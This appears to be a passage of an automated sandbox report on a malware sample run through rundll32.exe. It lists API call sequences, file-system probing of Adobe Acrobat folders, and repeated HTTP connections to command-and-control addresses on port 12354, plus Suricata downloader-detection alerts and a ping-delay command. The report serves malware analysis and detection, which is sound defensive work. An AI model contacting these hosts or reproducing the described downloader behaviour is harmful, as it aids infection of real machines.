Source:	Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\..\..*Yu source: rundll32.exe, 0000000B.00000003.2300135901.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\. source: rundll32.exe, 0000000B.00000003.3688624944.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671902920.0000000005E52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\..* source: rundll32.exe, 0000000B.00000003.1899075201.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\..yewy\.pv source: rundll32.exe, 0000000B.00000003.1705184799.000000000313E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.* source: rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,		11_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,		11_2_100052A0

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.108.0.52 443			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.241.232 12354			Jump to behavior

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 107.163.241.232 ports 1,2,3,4,5,12354

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50285 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50293 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50296 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50326 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50328 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50339 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50342 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50371 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50390 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50393 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50415 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50422 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50454 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50459 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50464 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50467 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50509 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50545 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50549 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50599 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50603 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50643 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50648 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50713 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50717 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50762 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50770 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50838 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50845 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50838 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50850 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50865 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50872 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50885 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50897 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50923 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50927 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50939 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50945 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50957 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50965 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50966 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50973 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50984 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50987 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51005 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51012 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51021 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51029 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51037 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51071 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51084 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51156 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51164 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51165 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51168 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51177 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51185 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51202 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51225 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51229 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51241 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51258 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51302 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51304 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51307 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51321 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51338 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51353 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51369 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51441 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51461 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51499 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51515 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51530 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51554 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51555 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51572 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51581 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51588 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51685 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51701 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51717 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51724 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51733 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51741 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51748 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51783 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51790 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51797 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51807 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51919 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51931 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51946 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52745 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52813 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52929 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52997 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53093 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53303 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53634 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53844 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54065 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54328 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54492 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54683 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54740 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55003 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55032 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55298 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55606 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55816 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55881 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55955 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56098 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56117 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56120 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56123 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56129 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56130 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56326 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56486 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56587 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56954 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57316 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58940 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59328 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60163 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60263 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60344 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60528 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60660 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60698 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60797 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60939 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60992 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61156 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61306 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61400 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61625 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61799 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63221 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63465 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63468 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63653 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63891 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 64121 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65244 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49614 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50623 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50853 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51256 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51370 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53048 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53658 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54598 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54765 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54937 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55059 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55060 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56681 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56767 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57028 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57231 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57363 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57493 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57675 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57843 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58049 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58209 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58358 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58512 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60331 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60382 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60510 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60772 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60820 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61316 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63372 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63392 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63454 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63569 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63737 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63781 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63828 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63851 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 64077 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 64597 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65257 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65289 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49154 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50853 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50868 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50870 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52788 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52806 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52835 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54029 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54070 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54209 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54325 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56038 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56199 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57129 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57816 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58639 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58741 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60441 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60671 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61903 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61986 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63794 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63920 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65326 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65458 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50825 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50847 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52005 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52150 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53912 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54033 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55293 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55419 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57129 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57352 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58562 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58708 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60021 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60121 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61491 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61570 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63505 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63612 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65323 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65389 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50829 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50975 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52158 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52198 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53724 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53837 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54347 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54354 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56039 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56201 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56252 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56254 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58073 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58090 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58146 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58153 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59396 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59400 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59732 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59839 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61066 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61081 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 62665 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 62888 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63787 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63901 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49405 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49512 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51247 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53222 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53356 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54771 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54925 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56860 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56879 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57630 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57670 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58364 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58692 -> 12354

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2

Source: global traffic

TCP traffic: 192.168.2.7:49734 -> 107.163.241.232:12354

Source: Joe Sandbox View	IP Address: 202.108.0.52 202.108.0.52
Source: Joe Sandbox View	IP Address: 202.108.0.52 202.108.0.52

Source: Joe Sandbox View

ASN Name: TAKE2US TAKE2US

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49734 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49735 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49748 -> 202.108.0.52:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49799 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49757 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49780 -> 202.108.0.52:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49760 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49779 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49853 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49819 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49777 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49821 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49881 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49879 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49859 -> 107.163.241.232:12354
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49840 -> 107.163.241.232:12354
